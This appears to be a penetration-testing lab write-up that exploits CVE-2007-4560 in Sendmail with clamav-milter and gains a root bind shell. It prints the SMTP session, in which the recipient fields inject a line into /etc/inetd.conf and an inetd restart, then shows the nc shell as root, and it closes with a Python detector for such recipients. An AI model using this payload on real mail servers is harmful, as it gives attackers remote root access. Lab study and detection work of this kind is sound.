CVE-2007-4560
Executing the Perl script
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/clamav]
└─$ perl CVE-2007-4560.pl $IP
Sendmail w/ clamav-milter Remote Root Exploit
Copyright (C) 2007 Eliteboy
Attacking 192.168.236.42...
220 localhost.localdomain ESMTP Sendmail 8.13.4/8.13.4/Debian-3sarge3; Sat, 22 Mar 2025 15:43:58 -0400; (No UCE/UBE) logging access from: [192.168.45.192](FAIL)-[192.168.45.192]
250-localhost.localdomain Hello [192.168.45.192], pleased to meet you
250-ENHANCEDSTATUSCODES
250-PIPELINING
250-EXPN
250-VERB
250-8BITMIME
250-SIZE
250-DSN
250-ETRN
250-DELIVERBY
250 HELP
250 2.1.0 <>... Sender ok
250 2.1.5 <nobody+"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf">... Recipient ok
250 2.1.5 <nobody+"|/etc/init.d/inetd restart">... Recipient ok
354 Enter mail, end with "." on a line by itself
250 2.0.0 52MJhwMr004062 Message accepted for delivery
221 2.0.0 localhost.localdomain closing connection
Exploit successfully sent.
If it worked, a bind shell should be available at the target port 31337
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/clamav]
└─$ nmap -p31337 $IP
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-22 16:57 CET
Nmap scan report for 192.168.236.42
Host is up (0.023s latency).
PORT STATE SERVICE
31337/tcp open Elite
Nmap done: 1 IP address (1 host up) scanned in 0.24 seconds
It worked.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/clamav]
└─$ nc -nv $IP 31337
(UNKNOWN) [192.168.236.42] 31337 (?) open
whoami
root
hostname
0xbabe.local
ip a
-i: line 3: ip: command not found
ifconfig
eth0 Link encap:Ethernet HWaddr 00:50:56:9E:A0:49
inet addr:192.168.236.42 Bcast:192.168.236.255 Mask:255.255.255.0
inet6 addr: fe80::250:56ff:fe9e:a049/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:63083 errors:0 dropped:0 overruns:0 frame:0
TX packets:56687 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:4856110 (4.6 MiB) TX bytes:3414396 (3.2 MiB)
Base address:0x2000 Memory:fd5c0000-fd5e0000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:10 errors:0 dropped:0 overruns:0 frame:0
TX packets:10 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:660 (660.0 b) TX bytes:660 (660.0 b)
Initial foothold established on the target system as the root user by exploiting CVE-2007-4560.
System-level compromise.
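From the defender's side, the recipient lines in the SMTP session above are the detectable artifact: a quoted local-part that begins a pipe to a program. The following is an added example, not part of the original notes or of the exploit script, that flags such recipients in an SMTP transcript or mail log. The function names, the metacharacter set and the last two sample lines are assumptions made for illustration.

```python
import re

# Heuristic, not a validator: these characters are legal in some RFC 5322
# local-parts but are also shell-significant and rare in real recipients.
SHELL_META = re.compile(r'[|;`$<>&]')
# Sendmail's reply to an accepted recipient, as seen in the transcript above.
RCPT_REPLY = re.compile(r'^250 2\.1\.5 <(?P<addr>.*)>\.\.\. Recipient ok$')
# The client-side command form, for logs that record commands instead.
RCPT_CMD = re.compile(r'^RCPT TO:\s*<(?P<addr>.*)>$', re.IGNORECASE)

# First three lines are copied from the session above; the last two are
# constructed for this example.
SAMPLE = r'''250 2.1.0 <>... Sender ok
250 2.1.5 <nobody+"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf">... Recipient ok
250 2.1.5 <nobody+"|/etc/init.d/inetd restart">... Recipient ok
250 2.1.5 <alice@example.com>... Recipient ok
RCPT TO:<ops&dev@example.com>'''.splitlines()


def extract_recipient(line):
    """Return the address inside <...> for a recipient line, else None."""
    for pattern in (RCPT_REPLY, RCPT_CMD):
        match = pattern.match(line.strip())
        if match:
            return match.group('addr')
    return None


def flag_recipients(lines):
    """Return (line_number, address, reason) for each suspicious recipient."""
    findings = []
    for number, line in enumerate(lines, 1):
        addr = extract_recipient(line)
        if addr is None:
            continue
        local = addr.rsplit('@', 1)[0]  # whole string when there is no domain
        if '"|' in local or local.startswith('|'):
            findings.append((number, addr, 'pipe-to-program recipient'))
        elif SHELL_META.search(local):
            findings.append((number, addr, 'shell metacharacter in local-part'))
    return findings


if __name__ == '__main__':
    for number, addr, reason in flag_recipients(SAMPLE):
        print(f'line {number}: {reason}: {addr}')
```

A hit on the pipe form, followed by a new listener on the host (here port 31337 via an added /etc/inetd.conf entry), is the sequence this session produced.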